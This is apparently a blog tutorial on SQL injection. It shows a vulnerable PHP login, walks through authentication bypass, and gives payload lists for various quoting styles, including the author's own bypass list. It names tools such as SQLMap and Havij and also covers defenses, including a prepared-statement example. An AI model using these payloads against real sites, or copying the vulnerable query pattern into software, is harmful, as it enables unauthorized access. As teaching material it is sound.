Data is one of the most vital components of information systems. Database-powered web applications are used by organizations to collect data from customers. SQL is the acronym for Structured Query Language; it is used to retrieve and manipulate data in a database.
What is a SQL Injection?
SQL Injection is an attack that poisons dynamic SQL statements, for example by commenting out part of the statement or appending a condition that is always true. It takes advantage of design flaws in poorly written web applications that build SQL statements from untrusted input, so that an attacker can make the database execute SQL of their own choosing.
How SQL Injection Works
The types of attacks that can be performed using SQL injection vary depending on the database engine. The attack works on dynamic SQL statements. A dynamic statement is one that is generated at run time using parameters passed from a web form or URI query string.
Let’s consider a simple web application with a login form. The code for the HTML form is shown below.
<form action="index.php" method="post">
  <input type="email" name="email" required="required"/>
  <input type="password" name="password"/>
  <input type="checkbox" name="remember_me" value="Remember me"/>
  <input type="submit" value="Submit"/>
</form>
The above form accepts an email address and a password and submits them to a PHP file named index.php. It has an option of storing the login session in a cookie, which we deduce from the remember_me checkbox. It uses the POST method to submit data, so the values are not displayed in the URL.
Let's suppose the statement at the backend for checking the user is built as follows:
$query = "SELECT * FROM users WHERE email = '" . $_POST['email'] . "' AND password = '" . md5($_POST['password']) . "'";
The above statement concatenates values from the $_POST array directly into the SQL, without escaping or parameterizing them. The password is hashed (not encrypted) with MD5 before comparison; MD5 is itself unsuitable for password storage, but that is a separate weakness from the injection.
First, let us look at a piece of PHP code that creates a login page vulnerable to this attack.
$query  = "select username,pass from users where username='$uname' and password='$passwrd' limit 0,1";
$result = mysql_query($query);   // $uname and $passwrd come straight from $_POST, unescaped
$rows   = mysql_fetch_array($result);
if ($rows)
    echo "You have Logged in successfully";
else
    echo "Better Luck Next time";
The code above takes the user input, places it into the SQL query as-is, and then checks whether any row came back; if one did, it treats you as logged in.
As we can see, the query wraps the input in single quotes, so the injected value has to start with a single quote to close the opening one; everything after it is then parsed as SQL.
So let's inject ' or ''=' into the query:
Logging in with following details:
Username : ' or ''='
Password : ' or ''='
select username,pass from users where username='' or ''='' and password='' or ''='' limit 0,1;
What we did is force the WHERE clause to be true using or. Note the precedence: AND binds tighter than OR, so the clause reads username='' OR (''='' AND password='') OR ''='', and the final ''='' is always true no matter what the password column holds. We can also comment out the rest of the query using a comment operator, for example with the following username and an empty password.
Username : ' or 1--
What we did is leave the password field empty and comment out the rest of the query. Let's look at the query part.
select username,pass from users where username='' or 1--' and password='' limit 0,1;
Anything after -- is treated as a comment and is not executed (in MySQL, -- only starts a comment when it is followed by a space, so type "-- " or use # instead), which reduces the query to:
select username,pass from users where username='' or 1;
Since the limit was commented out as well, this returns every row in the table; the application takes the first one and logs us in as that user, so the login is bypassed. That was the basic case; now let us look at different query shapes and the injections that fit each of them.
Query: select username,pass from users where username=('$username') and password=('$passwrd') limit 0,1;
Payloads:
') or true--
') or ('')=('
') or 1--
') or ('x')=('
Query: select username,pass from users where username="$username" and password="$passwrd" limit 0,1;
Payloads:
" or true--
" or ""="
" or 1--
" or "x"="
Query: select username,pass from users where username=("$username") and password=("$passwrd") limit 0,1;
Payloads:
") or true--
") or ("")=("
") or 1--
") or ("x")=("
Query: select username,pass from users where username=(('$username')) and password=(('$passwrd')) limit 0,1;
Payloads:
')) or true--
')) or ((''))=(('
')) or 1--
')) or (('x'))=(('
That should be enough explanation. To finish, here is my own bypass list, which I put together.
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
The list was getting long, so I removed the payloads that differ only in comment style; you can build those yourself by combining each of these payloads with the different comment types.
Other SQL Injection attack types
SQL injection can do more harm than just bypassing login checks. Some of the attacks include:
Executing commands on the server that can download and install malicious programs such as Trojans
Exporting valuable data such as credit card details, email, and passwords to the attacker’s remote server
Getting user login details etc
The above list is not exhaustive; it just gives you an idea of what SQL Injection
Automation Tools for SQL Injection
In the above example, we used manual attack techniques based on our vast knowledge of SQL. There are automated tools that can help you perform the attacks more efficiently and within the shortest possible time. These tools include
SQLSmack - http://www.securiteam.com/tools/5GP081P75C.html
SQLPing 2 - http://www.sqlsecurity.com/downloads/sqlping2.zip?attredirects=0&d=1
SQLMap - http://sqlmap.org/
How to Protect against SQL Injection Attacks
An organization can adopt the following policy to protect itself against SQL Injection attacks.
User input should never be trusted - it must be validated, and it must never be spliced into a dynamic SQL statement; pass it as a bound parameter instead. Escaping helps only as a fallback.
Stored procedures - these can encapsulate the SQL statements and treat all input as parameters, provided the procedure itself does not build dynamic SQL from those parameters.
Prepared statements - these work by sending the SQL statement to the database first and then supplying all user data as bound parameters. The data therefore has no effect on the syntax of the statement: a quote or -- inside a parameter stays a literal character.
Regular expressions - these can be used to detect and reject input that looks like SQL, but they are a weak, bypassable secondary control (the bypass list above shows how many variations exist) and must not replace parameterization.
Database connection user access rights - only the access rights that are actually needed should be given to the accounts used to connect to the database. This limits what an injected statement can do on the server, for example reading other tables or writing files.
Error messages - these should not reveal sensitive information or where exactly an error occurred. A simple custom error message such as "Sorry, we are experiencing technical errors. The technical team has been contacted. Please try again later" can be shown instead of displaying the SQL statement that caused the error; log the real error server-side.
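As an added example (not the page's code), here is the same login rewritten in Python using the sqlite3 driver's ? placeholders, a salted PBKDF2 hash in place of the bare md5(), and the generic error message recommended above; the sample accounts and the use of SQLite as a stand-in for MySQL are assumptions. Fed the page's payloads, it fails all of them, because the driver sends the statement and the values separately and the quote in ' or 1-- never becomes SQL syntax.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample accounts (an assumption, not the page's data).
SAMPLE_USERS = [("admin", "s3cret"), ("alice", "hunter2")]
PBKDF2_ITERATIONS = 100_000
GENERIC_ERROR = "Sorry, we are experiencing technical errors. Please try again later."


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256 instead of the page's bare md5(); returns (salt, digest)."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return salt, digest


# Hashed once at import so that a lookup for a non-existent user costs the same time
# as a real one (otherwise response time would reveal which usernames exist).
DUMMY_SALT, DUMMY_DIGEST = hash_password("placeholder")


def make_hardened_db():
    """In-memory SQLite stand-in for the page's MySQL `users` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text primary key, salt blob, digest blob)")
    for name, password in SAMPLE_USERS:
        salt, digest = hash_password(password)
        conn.execute("insert into users values (?, ?, ?)", (name, salt, digest))
    return conn


def safe_login(conn, username, password):
    """Prepared statement: the SQL text is fixed and `username` travels as a bound
    parameter, so quotes, parentheses and -- inside it are data, never syntax.
    Returns the username on success, None on failure, GENERIC_ERROR on a DB fault."""
    try:
        row = conn.execute(
            "select username, salt, digest from users where username = ?",
            (username,),
        ).fetchone()
    except sqlite3.Error:
        # Log the real exception server-side; never show the statement to the user.
        return GENERIC_ERROR
    salt, digest = (row[1], row[2]) if row else (DUMMY_SALT, DUMMY_DIGEST)
    _, candidate = hash_password(password, salt)
    # Constant-time comparison; the `row is not None` check keeps the dummy from matching.
    if row is not None and hmac.compare_digest(candidate, digest):
        return row[0]
    return None


if __name__ == "__main__":
    conn = make_hardened_db()
    for u, p in [("alice", "hunter2"), ("' or ''='", "' or ''='"), ("' or 1--", ""), ("')) or 1--", "")]:
        print(f"{u!r:16} -> {safe_login(conn, u, p)}")
```

The same pattern applies in PHP with PDO or mysqli: prepare the statement with placeholders, bind the form values, and let the driver handle quoting.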
Hacking Activity: Use Havij for SQL Injection
In this practical scenario, we are going to use Havij Advanced SQL Injection program to scan a website for vulnerabilities.
Note: your anti-virus program will likely flag it because of what it does. Run it in an isolated virtual machine rather than adding exclusions or pausing protection on a machine you use for other work.
An Ethical hacker should know the penalties of unauthorized hacking into a system. Read more at: Legality and Ethics
For more tricks and updates on hacking, stay tuned to our site: Note 4 Tech